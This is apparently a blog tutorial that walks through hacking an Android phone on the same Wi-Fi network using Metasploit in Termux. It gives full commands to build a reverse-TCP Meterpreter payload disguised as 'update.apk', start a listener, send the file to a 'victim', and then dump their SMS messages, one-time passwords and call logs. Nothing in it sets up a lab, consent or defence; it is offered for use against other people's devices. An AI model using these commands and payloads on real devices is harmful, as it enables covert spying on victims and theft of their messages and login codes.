Banner ads

metasploit android hacking over lan

metasploit android hacking over lan - Hi guys if you are searching for metasploit android hacking over lan and searching for the best article to get the best explanation about metasploit android hacking over lan. Then you are in the right place.

Today I'm here going to share the step by step tutorial about "metasploit android hacking over lan". By this article, you can get a lot of about Metasploit app fro android, how to hack android mobile, how to hack android in same wifi, Metasploit hacking course part 3, And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.

metasploit android hacking over lan
metasploit android hacking over lan


metasploit android hacking over lan


Hello, guy's I am back with another amazing post so today we get to know about how to create and hack any android over the LAN (local area network) the device connected to the same hotspot or router. by Metasploit framework in termux without any issue by simple steps so guy's by this method you can hack anything in target device like Contacts, Sms, Call history, Screen, Location, etc. So guy's now it's time to go through the practical part of Metasploit over wan.



#Follow below step's


1Install termux and update and upgrade it



$ pkg install php -y

$ pkg install git -y


$ pkg install python -y


$ pkg install perl -y


$ pkg install python2 -y


$ pkg install ruby -y


$ cd $HOME


$ git clone https://github.com/noob-hackers/m-wiz


#STEP 1 (METASPLOIT INSTALLATION NO ROOT)


This script will install Metasploit framework in your termux app so you need some requirements to use Metasploit in termux


> Good internet connection

> 1 Gb of internet
> 2 Gb of storage
> Stable android device version not below then 4.0.0
> Patience

After completing all requirements you can go ahead for the installation of Metasploit in termux.


$ ls


$ cd m-wiz


$ bash m-wiz.sh


Now here in script menu select option 1 to install Metasploit framework in termux and after a 30 seconds process will be shown and after that, a version selection menu will have appeared and in that select, you devise version and click on enter in keyboard and wait for at least 1 hour or 1:30 hour it depends on your android device so I recommend you to stay away from the device until the Metasploit installs properly. So take a walk outside till it installs :)


#STEP 2 (METASPLOIT CONSOLE OPENING)


After the successful installation Metasploit will automatically be opened in the same session if it doesn't then follow the below step. if you are using (6.0.0) version based device


$ cd ..


$ ls


$ cd usr


$ cd opt


$ cd metasploit-framework


$ ./msfconsole


Or 


$ msfconsole


Now from here the Metasploit console will be opened if it doesn't then repair Metasploit from the m-wiz tool it will solve the issue...


#STEP 3 (CREATING PAYLOAD AND HACKING TARGET)


1. Here we need to be connected to the safe wifi in which our target is connected (victim) after that open termux app and open 1st session (new session)


2. Now, in the 1st session type ipconfig and here search for ip starting with 192.168. something like this after getting that ip now copy it somewhere in note.


3. Now, open 2nd session and open metasploit directoty


$ cd $HOME/metasploit-framework


$ ls


$ ./msfvenom -p android/meterpreter/reverse_tcp LHOST=(yourip here) LPORT=4444 R > /sdcard/update.apk



Ex:- ./msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.48.24 LPORT=4444 R > /sdcard/update.apk

#STEP 4 (EXPLOITING LAST STEP)


Wait until payload get ready ....after that follow this (open 3rd session)


$ cd $HOME/metasploit-framework


$ ./msfconsole


now open new (4th) session and apply these commands


$  pg_ctl -D $PREFIX/var/lib/postgresql start (not that important)


now come back to (3rd session) in which you opened Metasploit now apply these commands.


$ db_status


$ use exploit/multi/handler


$ set payload android/meterpreter/reverse_tcp


$ set lhost (your ip here)


$ set lport (the port you given)


$ exploit


(now go to your file manager and check for update.apk payload and send it to your victim and when he opens it you will get meterpreter session to hack his device)


#STEP 6 (HACKING DETAILS AFTER METERPRETER SESSION)


Now when you get meterpreter session of your victim device follow the below steps to get his info.


Ex :-


meterpreter> help


(Now here all the commands to dump data will be shown now use them according to you needs for example.)


meterpreter > dump_sms


This command gets all our victims mobile SMS and OTP's and it will be saved in .txt formate like sms5563543bbfbbff.txt 



Like this you can fetch and save many things as I said in the beginning of this post and to see saved or fetched data.

$ cd $HOME/metasploit-framework


$ ls


Here, you will get all the saved .txt call logs and information and etc... to see that


$ cat calllogs586464dec564.txt


This will show all info in script formate. So guys that's all for today so I hope you liked this one.


metasploit android hacking over lan in termux in pdf version

English ----> Click Here 
Kannada ----> Click Here
Tamil ----> Click Here
Urdu ----> Click Here
Hindi ----> Click Here



 websites I used in the video

Click Here


watch the practical video here ( part 1 )

Click Here

watch the practical video here ( part 2 )

Click Here

watch the practical video here ( part 3 )

watch the practical video here ( part 4 )

Click Here

watch the practical video here ( part 5 )

Click Here

watch the practical video here ( part 6 )

Click Here

watch the practical video here ( part 7 )

Click Here


Follow this carefully
Please don't skip the video ...
So guys follow the steps as I showed from starting of the video to the end of the video ok. So after all, if you are facing any problem then comment or use contact us page, please........

Errors or issue reasons

  • Command error 

  • Data connection problem 

  • Big letters using in commands 

  • Giving more space b/n words 

  • lack of patience

    "Solution for all these problems is watching a video without skip until the end"

    Link for Script/Tool will be available below
    Click On Below Button


    Post a Comment

    0 Comments